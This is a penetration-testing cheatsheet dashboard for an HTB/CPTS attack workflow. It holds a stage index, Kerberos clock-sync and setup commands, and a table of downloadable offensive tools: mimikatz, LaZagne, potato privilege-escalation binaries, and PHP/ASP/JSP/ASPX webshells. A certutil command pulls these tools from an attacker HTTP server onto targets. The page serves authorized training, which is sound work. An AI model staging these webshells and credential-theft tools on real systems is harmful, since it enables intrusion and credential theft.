daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-flow-dashboard.md (28605B)


      1 ---
      2 title: "HTB Pentest Attack Flow — Dashboard"
      3 description: "The complete CPTS attack-flow index, stage map, decision points, and offline toolkit entry point."
      4 category: pentest-workflow
      5 subcategory: "CPTS Attack Flow"
      6 order: 0
      7 tags: ["htb", "cpts", "penetration-testing", "attack-flow", "pentest-workflow"]
      8 tools: ["NetExec", "Impacket", "BloodHound CE", "Certipy", "GhostPack"]
      9 difficulty: intermediate
     10 updated: "2026-08-29"
     11 source: "vault:Pentest Attack Flow/00 - Attack Flow Dashboard.md"
     12 ---
     13 # HTB Pentest Attack Flow
     14 
     15 > [!dashboard] Workspace
     16 > **Playbook:** [HTB Attack Flow Playbook](/sheets/pentest-workflow/htb-attack-flow-playbook)
     17 >
     18 > **Vault:** Cybersecurity MOC
     19 >
     20 > **Purpose:** Move from scope and reconnaissance through exploitation, post-exploitation, evidence handling, and reporting.
     21 
     22 > [!warning] Authorized targets only
     23 > Use these commands only inside an engagement or lab where you have explicit permission. Record scope, timestamps, commands, and evidence as you work.
     24 
     25 ## Quick Setup
     26 
     27 > [!tip] Set the engagement context once
     28 > Keep target details in the shell environment so commands remain readable and accidental target mix-ups are less likely.
     29 
     30 ```bash
     31 export IP="10.10.10.10"          # primary target host
     32 export TARGET="target.htb"
     33 export DOMAIN="inlanefreight.local"
     34 export DC="dc01.$DOMAIN"         # DC FQDN
     35 export DCIP="10.10.10.5"         # DC IP — most impacket/nxc flags want -dc-ip $DCIP
     36 export LHOST="10.10.14.2"
     37 export U="username"
     38 export P="password"
     39 export NT=""                     # NT hash, when you have one: -hashes :$NT
     40 ```
     41 
     42 ```bash
     43 printf '%s\t%s %s\n' "$IP" "$TARGET" "$DC" | sudo tee -a /etc/hosts
     44 printf '%s\t%s\n' "$DCIP" "$DC" | sudo tee -a /etc/hosts
     45 ```
     46 
     47 > [!tip] Wordlists — set once, reuse everywhere
     48 > ```bash
     49 > export ROCKYOU="/usr/share/wordlists/rockyou.txt"
     50 > export SECLISTS="/usr/share/SecLists"
     51 > # common pulls:
     52 > #   $SECLISTS/Discovery/Web-Content/raft-medium-directories.txt
     53 > #   $SECLISTS/Usernames/xato-net-10-million-usernames.txt
     54 > #   $SECLISTS/Passwords/Leaked-Databases/rockyou.txt
     55 > ```
     56 > On a fresh attack box: `sudo apt install seclists wordlists && sudo gunzip /usr/share/wordlists/rockyou.txt.gz`. Repo: [SecLists](https://github.com/danielmiessler/SecLists).
     57 
     58 > [!note] Keep the clock synchronized
     59 > Kerberos is time-sensitive (max ~5 min skew, `KRB_AP_ERR_SKEW`). If authentication fails unexpectedly, compare your clock with the domain controller before changing attack paths.
     60 > ```bash
     61 > nmap -p 88 --script clock-skew -Pn $DCIP        # measure the skew
     62 > sudo ntpdate $DCIP                              # hard-sync (or: sudo timedatectl set-ntp off first)
     63 > faketime -f '+7h30m' getTGT.py "$DOMAIN/$U:$P" -dc-ip $DCIP   # or wrap just the one tool
     64 > ```
     65 > Prefer [faketime](https://github.com/wolfcw/libfaketime) per-command over touching the system clock; `htpdate` works when only HTTP(S) egress exists. Deep dive: [Stage 05 — Kerberos Attacks](/sheets/pentest-workflow/kerberos-attacks).
     66 
     67 > [!tools] Modern toolchain (2026) — legacy → current
     68 > | Legacy | Use instead | Why |
     69 > |---|---|---|
     70 > | [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) (`cme`) | [NetExec](https://github.com/Pennyw0rth/NetExec) (`nxc`) | cme is unmaintained; nxc is the drop-in successor (`nxc smb/ldap/winrm/mssql`). |
     71 > | BloodHound Legacy + SharpHound 4 | [BloodHound CE](https://github.com/SpecterOps/BloodHound) + [bloodhound-ce-python](https://github.com/dirkjanm/BloodHound.py) / [RustHound-CE](https://github.com/g0h4n/RustHound-CE) | CE (Postgres, new edge model) is what HTB/CPTS material assumes now; legacy ingestors break against it. |
     72 > | ADCS by hand | [Certipy](https://github.com/ly4k/Certipy) (`certipy-ad find -vulnerable`) + on-host [Certify.exe](/downloads/pentest-workflow/Certify.exe) ([SHA-256](/downloads/pentest-workflow/Certify.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Certify.exe.sha256.asc)) | One command maps ESC1–ESC16 instead of manual template audit. |
     73 > | On-host Kerberos by hand | [Rubeus.exe](/downloads/pentest-workflow/Rubeus.exe) ([SHA-256](/downloads/pentest-workflow/Rubeus.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Rubeus.exe.sha256.asc)) | Roast, asktgt/asktgs, delegation abuse, ticket injection from Windows. |
     74 > | Manual ACL edits | [bloodyAD](https://github.com/CravateRouge/bloodyAD) / impacket `dacledit.py`, `owneredit.py`, `rbcd.py` | Reversible, scriptable ACE changes. |
     75 >
     76 > Everything in the right column above (and more) ships **offline** in this vault — see the toolkit table below.
     77 
     78 ## Kill Chain
     79 
     80 <figure class="flow plate corners">
     81   <figcaption class="flow__cap"><span class="flow__kind">CPTS kill chain</span><span class="flow__dir">LR</span></figcaption>
     82   <div class="flow__body">
     83     <div class="flow__diagram" data-dir="lr">
     84       <div class="flow-rank"><div class="flow-node is-entry">00 Passive Recon</div></div>
     85       <div class="flow-edge"></div>
     86       <div class="flow-rank"><div class="flow-node">01 Host Discovery</div></div>
     87       <div class="flow-edge"></div>
     88       <div class="flow-rank"><div class="flow-node">02 Web Enumeration</div></div>
     89       <div class="flow-edge"></div>
     90       <div class="flow-rank"><div class="flow-node">Foothold Toolkits</div></div>
     91       <div class="flow-edge"></div>
     92       <div class="flow-rank"><div class="flow-node">03 Service Enumeration</div></div>
     93       <div class="flow-edge"></div>
     94       <div class="flow-rank"><div class="flow-node">04 AD Enumeration</div></div>
     95       <div class="flow-edge"></div>
     96       <div class="flow-rank"><div class="flow-node">05 Kerberos Attacks</div></div>
     97       <div class="flow-edge"></div>
     98       <div class="flow-rank"><div class="flow-node">06 ACL and Object Abuse</div></div>
     99       <div class="flow-edge"></div>
    100       <div class="flow-rank"><div class="flow-node">07 ADCS Abuse</div></div>
    101       <div class="flow-edge"></div>
    102       <div class="flow-rank"><div class="flow-node">08 Credential Attacks</div></div>
    103       <div class="flow-edge"></div>
    104       <div class="flow-rank"><div class="flow-node">09 Privilege Escalation</div></div>
    105       <div class="flow-edge"></div>
    106       <div class="flow-rank"><div class="flow-node">10 Lateral Movement and Pivoting</div></div>
    107       <div class="flow-edge"></div>
    108       <div class="flow-rank"><div class="flow-node">Trusts and Cross-Forest</div></div>
    109       <div class="flow-edge"></div>
    110       <div class="flow-rank"><div class="flow-node is-goal">11 Documentation and Reporting</div></div>
    111     </div>
    112   </div>
    113 </figure>
    114 
    115 ## Stage Index
    116 
    117 | # | Stage | Primary outcome |
    118 |---:|---|---|
    119 | 01 | [Stage 00 — Passive External Recon](/sheets/pentest-workflow/passive-external-recon) | Build an external picture without touching the target. |
    120 | 02 | [Stage 01 — Recon and Host Discovery](/sheets/pentest-workflow/recon-and-host-discovery) | Identify live hosts, services, names, and initial priorities. |
    121 | 03 | [Stage 02 — Web Enumeration and Exploitation](/sheets/pentest-workflow/web-enumeration-and-exploitation) | Map and test the web attack surface. |
    122 | 04 | [Foothold Toolkit — File Transfers](/sheets/pentest-workflow/foothold-file-transfers) | Move tools and evidence using an appropriate channel. |
    123 | 05 | [Foothold Toolkit — Shells, Payloads, and Metasploit](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) | Establish and stabilize an authorized foothold. |
    124 | 06 | [Stage 03 — Service Enumeration](/sheets/pentest-workflow/service-enumeration) | Deep-enumerate SMB, RPC, LDAP, DNS, and other services. |
    125 | 07 | [Stage 04 — Active Directory Enumeration](/sheets/pentest-workflow/active-directory-enumeration) | Build the directory, host, session, and privilege graph. |
    126 | 08 | [Stage 05 — Kerberos Attacks](/sheets/pentest-workflow/kerberos-attacks) | Identify and validate Kerberos-specific attack paths. |
    127 | 09 | [Stage 06 — ACL and Object Abuse](/sheets/pentest-workflow/acl-and-object-abuse) | Turn delegated rights and object control into escalation paths. |
    128 | 10 | [Stage 07 — ADCS and Certificate Abuse](/sheets/pentest-workflow/adcs-and-certificate-abuse) | Enumerate and safely validate certificate attack paths. |
    129 | 11 | [Stage 08 — Password Attacks and Credential Hunting](/sheets/pentest-workflow/password-attacks-and-credential-hunting) | Find, validate, and protect credential material. |
    130 | 12 | [Stage 09 — Privilege Escalation](/sheets/pentest-workflow/privilege-escalation) | Escalate locally on Linux or Windows with evidence. |
    131 | 13 | [Stage 10 — Lateral Movement, Pivoting, and Loot](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) | Move deliberately, reach segmented assets, and collect evidence. |
    132 | 14 | [Domain Trusts and Cross-Forest](/sheets/pentest-workflow/domain-trusts-and-cross-forest) | Extend the graph beyond a single domain. |
    133 | 15 | [Stage 11 — Documentation and Reporting](/sheets/pentest-workflow/documentation-and-reporting) | Maintain evidence and turn validated paths into findings. |
    134 | 16 | [Appendix — Worked Chains](/sheets/pentest-workflow/worked-chains) | Review end-to-end examples. |
    135 | 17 | [Tool Index](/sheets/pentest-workflow/tool-index) | Jump from a tool to its place in the workflow. |
    136 
    137 ## Offline Toolkit (attachments/)
    138 
    139 The `attachments/` folder **ships offline with this vault** — no egress needed on an air-gapped or HTB VPN lab. Verify integrity before staging anything to a target (record: [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc))):
    140 
    141 ```bash
    142 cd attachments && sha256sum -c SHA256SUMS.txt --ignore-missing
    143 ```
    144 
    145 > [!warning] Verify, then stage
    146 > Confirm every binary against [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc)) before use, and expect AV/Defender to flag most of these — stage in a lab, whitelist only in-scope paths, and clean up afterwards ([Stage 11](/sheets/pentest-workflow/documentation-and-reporting)).
    147 
    148 | File | Platform | Purpose | Primary stage |
    149 |---|---|---|---|
    150 | [Certify.exe](/downloads/pentest-workflow/Certify.exe) ([SHA-256](/downloads/pentest-workflow/Certify.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Certify.exe.sha256.asc)) | Windows | GhostPack Certify — on-host ADCS enumeration/abuse (ESC paths) | [Stage 07](/sheets/pentest-workflow/adcs-and-certificate-abuse) |
    151 | [Go365_linux_amd64.tar.gz](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/Go365_linux_amd64.tar.gz.sha256.asc)) | Linux | Go365 — Office 365 password spraying | [Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting) |
    152 | [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) | Windows (.NET 3.5) | SeImpersonate → SYSTEM (works with Spooler disabled) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    153 | [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) | Windows (.NET 4.x) | SeImpersonate → SYSTEM (works with Spooler disabled) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    154 | [Inveigh.ps1](/downloads/pentest-workflow/Inveigh.ps1) ([SHA-256](/downloads/pentest-workflow/Inveigh.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/Inveigh.ps1.sha256.asc)) | Windows | LLMNR/NBNS/mDNS spoofing + NTLM capture (Windows-side Responder) | [Stage 03](/sheets/pentest-workflow/service-enumeration) |
    155 | [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) | Windows | SeImpersonate privesc (pre-Server 2019 / Win10 1809) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    156 | [LaZagne.exe](/downloads/pentest-workflow/LaZagne.exe) ([SHA-256](/downloads/pentest-workflow/LaZagne.exe.sha256) · [GPG signature](/downloads/pentest-workflow/LaZagne.exe.sha256.asc)) | Windows | Local credential looting (browsers, mail, Wi-Fi, etc.) | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    157 | [MSOLSpray.ps1](/downloads/pentest-workflow/MSOLSpray.ps1) ([SHA-256](/downloads/pentest-workflow/MSOLSpray.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/MSOLSpray.ps1.sha256.asc)) | Windows | Azure AD / O365 password spraying | [Stage 08](/sheets/pentest-workflow/password-attacks-and-credential-hunting) |
    158 | [PetitPotam.py](/downloads/pentest-workflow/PetitPotam.py) ([SHA-256](/downloads/pentest-workflow/PetitPotam.py.sha256) · [GPG signature](/downloads/pentest-workflow/PetitPotam.py.sha256.asc)) | Linux | EFS RPC NTLM coercion (ESC8 prerequisite) | [Stage 07](/sheets/pentest-workflow/adcs-and-certificate-abuse) |
    159 | [PowerUp.ps1](/downloads/pentest-workflow/PowerUp.ps1) ([SHA-256](/downloads/pentest-workflow/PowerUp.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerUp.ps1.sha256.asc)) | Windows | PowerSploit PowerUp — Windows privesc misconfig checks | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    160 | [PowerView.ps1](/downloads/pentest-workflow/PowerView.ps1) ([SHA-256](/downloads/pentest-workflow/PowerView.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PowerView.ps1.sha256.asc)) | Windows | PowerSploit PowerView — AD enumeration | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) |
    161 | [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) | Windows | SeImpersonate → SYSTEM via named pipe (needs Spooler) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    162 | [PrivescCheck.ps1](/downloads/pentest-workflow/PrivescCheck.ps1) ([SHA-256](/downloads/pentest-workflow/PrivescCheck.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/PrivescCheck.ps1.sha256.asc)) | Windows | PrivescCheck — PowerShell Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    163 | [Rubeus.exe](/downloads/pentest-workflow/Rubeus.exe) ([SHA-256](/downloads/pentest-workflow/Rubeus.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Rubeus.exe.sha256.asc)) | Windows | GhostPack Rubeus — Kerberos abuse (roast, tickets, delegation) | [Stage 05](/sheets/pentest-workflow/kerberos-attacks) |
    164 | [SHA256SUMS](/downloads/pentest-workflow/SHA256SUMS) ([GPG signature](/downloads/pentest-workflow/SHA256SUMS.asc)) | Any | Integrity record for every file in `attachments/` | This dashboard |
    165 | [Seatbelt.exe](/downloads/pentest-workflow/Seatbelt.exe) ([SHA-256](/downloads/pentest-workflow/Seatbelt.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Seatbelt.exe.sha256.asc)) | Windows | GhostPack Seatbelt — host situational awareness | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    166 | [SharpDPAPI.exe](/downloads/pentest-workflow/SharpDPAPI.exe) ([SHA-256](/downloads/pentest-workflow/SharpDPAPI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpDPAPI.exe.sha256.asc)) | Windows | GhostPack SharpDPAPI — DPAPI masterkey/blob abuse | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    167 | [SharpHound.zip](/downloads/pentest-workflow/SharpHound.zip) ([SHA-256](/downloads/pentest-workflow/SharpHound.zip.sha256) · [GPG signature](/downloads/pentest-workflow/SharpHound.zip.sha256.asc)) | Windows | SharpHound collector (exe + ps1) for BloodHound CE | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) |
    168 | [SharpUp.exe](/downloads/pentest-workflow/SharpUp.exe) ([SHA-256](/downloads/pentest-workflow/SharpUp.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpUp.exe.sha256.asc)) | Windows | GhostPack SharpUp — privesc misconfig checks (C#) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    169 | [SharpView.exe](/downloads/pentest-workflow/SharpView.exe) ([SHA-256](/downloads/pentest-workflow/SharpView.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpView.exe.sha256.asc)) | Windows | SharpView — C# port of PowerView | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) |
    170 | [SharpWMI.exe](/downloads/pentest-workflow/SharpWMI.exe) ([SHA-256](/downloads/pentest-workflow/SharpWMI.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SharpWMI.exe.sha256.asc)) | Windows | GhostPack SharpWMI — WMI lateral movement | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    171 | [Snaffler.exe](/downloads/pentest-workflow/Snaffler.exe) ([SHA-256](/downloads/pentest-workflow/Snaffler.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Snaffler.exe.sha256.asc)) | Windows | Snaffler — hunt creds in domain shares | [Stage 03](/sheets/pentest-workflow/service-enumeration) |
    172 | [StandIn_v13_Net35_45.zip](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip) ([SHA-256](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256) · [GPG signature](/downloads/pentest-workflow/StandIn_v13_Net35_45.zip.sha256.asc)) | Windows | StandIn — AD object/ACE manipulation from Windows | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) |
    173 | [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) | Windows | Potato combo (PrintSpoofer + Rotten + EfsRpc) | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    174 | [Whisker.exe](/downloads/pentest-workflow/Whisker.exe) ([SHA-256](/downloads/pentest-workflow/Whisker.exe.sha256) · [GPG signature](/downloads/pentest-workflow/Whisker.exe.sha256.asc)) | Windows | Shadow Credentials (msDS-KeyCredentialLink) from Windows | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) |
    175 | [chisel.exe](/downloads/pentest-workflow/chisel.exe) ([SHA-256](/downloads/pentest-workflow/chisel.exe.sha256) · [GPG signature](/downloads/pentest-workflow/chisel.exe.sha256.asc)) | Windows | chisel — TCP/UDP tunneling over HTTP | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    176 | [chisel_linux_amd64](/downloads/pentest-workflow/chisel_linux_amd64) ([SHA-256](/downloads/pentest-workflow/chisel_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/chisel_linux_amd64.sha256.asc)) | Linux | chisel — TCP/UDP tunneling over HTTP | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    177 | [donut_v1.1.zip](/downloads/pentest-workflow/donut_v1.1.zip) ([SHA-256](/downloads/pentest-workflow/donut_v1.1.zip.sha256) · [GPG signature](/downloads/pentest-workflow/donut_v1.1.zip.sha256.asc)) | Cross | donut — PE/DLL/EXE → position-independent shellcode | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) |
    178 | [fscan_windows_x64.exe](/downloads/pentest-workflow/fscan_windows_x64.exe) ([SHA-256](/downloads/pentest-workflow/fscan_windows_x64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/fscan_windows_x64.exe.sha256.asc)) | Windows | fscan — internal all-in-one scanner (ports, services, creds) | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    179 | [gowitness_linux_amd64](/downloads/pentest-workflow/gowitness_linux_amd64) ([SHA-256](/downloads/pentest-workflow/gowitness_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/gowitness_linux_amd64.sha256.asc)) | Linux | gowitness — bulk web screenshotting | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    180 | [gowitness_windows_amd64.exe](/downloads/pentest-workflow/gowitness_windows_amd64.exe) ([SHA-256](/downloads/pentest-workflow/gowitness_windows_amd64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/gowitness_windows_amd64.exe.sha256.asc)) | Windows | gowitness — bulk web screenshotting | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    181 | [jaws-enum.ps1](/downloads/pentest-workflow/jaws-enum.ps1) ([SHA-256](/downloads/pentest-workflow/jaws-enum.ps1.sha256) · [GPG signature](/downloads/pentest-workflow/jaws-enum.ps1.sha256.asc)) | Windows | JAWS — Windows privesc enumeration script | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    182 | [kerbrute_linux_amd64](/downloads/pentest-workflow/kerbrute_linux_amd64) ([SHA-256](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_linux_amd64.sha256.asc)) | Linux | kerbrute — Kerberos user enum + spray | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) |
    183 | [kerbrute_windows_amd64.exe](/downloads/pentest-workflow/kerbrute_windows_amd64.exe) ([SHA-256](/downloads/pentest-workflow/kerbrute_windows_amd64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/kerbrute_windows_amd64.exe.sha256.asc)) | Windows | kerbrute — Kerberos user enum + spray | [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) |
    184 | [ligolo-ng_agent_linux_amd64.tar.gz](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_linux_amd64.tar.gz.sha256.asc)) | Linux | ligolo-ng agent — TUN-based pivoting | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    185 | [ligolo-ng_agent_windows_amd64.zip](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip) ([SHA-256](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ligolo-ng_agent_windows_amd64.zip.sha256.asc)) | Windows | ligolo-ng agent — TUN-based pivoting | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    186 | [linpeas.sh](/downloads/pentest-workflow/linpeas.sh) ([SHA-256](/downloads/pentest-workflow/linpeas.sh.sha256) · [GPG signature](/downloads/pentest-workflow/linpeas.sh.sha256.asc)) | Linux | LinPEAS — Linux privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    187 | [linpeas_linux_amd64](/downloads/pentest-workflow/linpeas_linux_amd64) ([SHA-256](/downloads/pentest-workflow/linpeas_linux_amd64.sha256) · [GPG signature](/downloads/pentest-workflow/linpeas_linux_amd64.sha256.asc)) | Linux | LinPEAS binary build | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    188 | [mimikatz_trunk.zip](/downloads/pentest-workflow/mimikatz_trunk.zip) ([SHA-256](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256) · [GPG signature](/downloads/pentest-workflow/mimikatz_trunk.zip.sha256.asc)) | Windows | mimikatz — credential extraction, tickets, DCSync | [Stage 10](/sheets/pentest-workflow/lateral-movement-pivoting-and-loot) |
    189 | [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) | Windows | netcat for Windows — shells, transfers, listeners | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) |
    190 | [nishang-master.zip](/downloads/pentest-workflow/nishang-master.zip) ([SHA-256](/downloads/pentest-workflow/nishang-master.zip.sha256) · [GPG signature](/downloads/pentest-workflow/nishang-master.zip.sha256.asc)) | Windows | Nishang — offensive PowerShell toolkit | [Foothold — Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) |
    191 | [nt-webshell-rosepine.aspx](/downloads/pentest-workflow/nt-webshell-rosepine.aspx) ([SHA-256](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256) · [GPG signature](/downloads/pentest-workflow/nt-webshell-rosepine.aspx.sha256.asc)) | IIS / ASPX | Custom C# ASPX webshell for IIS targets | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    192 | [pspy32](/downloads/pentest-workflow/pspy32) ([SHA-256](/downloads/pentest-workflow/pspy32.sha256) · [GPG signature](/downloads/pentest-workflow/pspy32.sha256.asc)) | Linux (x86) | pspy — unprivileged process/cron monitor | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    193 | [pspy64](/downloads/pentest-workflow/pspy64) ([SHA-256](/downloads/pentest-workflow/pspy64.sha256) · [GPG signature](/downloads/pentest-workflow/pspy64.sha256.asc)) | Linux (x64) | pspy — unprivileged process/cron monitor | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    194 | [rp-shell.asp](/downloads/pentest-workflow/rp-shell.asp) ([SHA-256](/downloads/pentest-workflow/rp-shell.asp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.asp.sha256.asc)) | IIS / ASP | Classic ASP webshell | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    195 | [rp-shell.jsp](/downloads/pentest-workflow/rp-shell.jsp) ([SHA-256](/downloads/pentest-workflow/rp-shell.jsp.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.jsp.sha256.asc)) | Java app servers | JSP webshell (Tomcat, JBoss, etc.) | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    196 | [rp-shell.php](/downloads/pentest-workflow/rp-shell.php) ([SHA-256](/downloads/pentest-workflow/rp-shell.php.sha256) · [GPG signature](/downloads/pentest-workflow/rp-shell.php.sha256.asc)) | PHP hosts | PHP webshell | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    197 | [targetedKerberoast.py](/downloads/pentest-workflow/targetedKerberoast.py) ([SHA-256](/downloads/pentest-workflow/targetedKerberoast.py.sha256) · [GPG signature](/downloads/pentest-workflow/targetedKerberoast.py.sha256.asc)) | Linux | Targeted kerberoast — set an SPN on a GenericWrite target | [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse) |
    198 | [winPEASany.exe](/downloads/pentest-workflow/winPEASany.exe) ([SHA-256](/downloads/pentest-workflow/winPEASany.exe.sha256) · [GPG signature](/downloads/pentest-workflow/winPEASany.exe.sha256.asc)) | Windows (any arch) | WinPEAS — Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    199 | [winPEASx64.exe](/downloads/pentest-workflow/winPEASx64.exe) ([SHA-256](/downloads/pentest-workflow/winPEASx64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/winPEASx64.exe.sha256.asc)) | Windows (x64) | WinPEAS — Windows privesc enumeration | [Stage 09](/sheets/pentest-workflow/privilege-escalation) |
    200 | [ysoserial-all.jar](/downloads/pentest-workflow/ysoserial-all.jar) ([SHA-256](/downloads/pentest-workflow/ysoserial-all.jar.sha256) · [GPG signature](/downloads/pentest-workflow/ysoserial-all.jar.sha256.asc)) | Java | ysoserial — Java deserialization payloads | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    201 | [ysoserial.net_v1.36.zip](/downloads/pentest-workflow/ysoserial.net_v1.36.zip) ([SHA-256](/downloads/pentest-workflow/ysoserial.net_v1.36.zip.sha256) · [GPG signature](/downloads/pentest-workflow/ysoserial.net_v1.36.zip.sha256.asc)) | Windows | ysoserial.net — .NET deserialization payloads | [Stage 02](/sheets/pentest-workflow/web-enumeration-and-exploitation) |
    202 
    203 > [!tip] Where to stage from
    204 > Serve the whole folder from your attack box with `python3 -m http.server 8000 --directory attachments` or [updog](https://github.com/sc0tfree/updog), then pull with `certutil -urlcache -split -f http://$LHOST:8000/<file>` or `iwr` — transfer recipes in [Foothold Toolkit — File Transfers](/sheets/pentest-workflow/foothold-file-transfers).
    205 
    206 ## Progress
    207 ## Engagement Discipline
    208 
    209 - Work from scope and evidence, not assumptions.
    210 - Prefer the least invasive test that proves or disproves a path.
    211 - Keep raw output separate from conclusions.
    212 - Record credentials as sensitive evidence; do not paste secrets into permanent notes.
    213 - Log every material target change and include a rollback step.
    214 - Stop and reassess when a command could affect availability or other users.
    215 - Every new credential = restart at [Stage 04](/sheets/pentest-workflow/active-directory-enumeration) as that identity (new BloodHound edges).
    216 - Reverse every AD object/ACE change you make — see the OPSEC callouts in [Stage 06](/sheets/pentest-workflow/acl-and-object-abuse).
    217 
    218 ---
    219 
    220 > [!navigation] Start the workflow
    221 > **Next:** [Stage 00 — Passive External Recon](/sheets/pentest-workflow/passive-external-recon)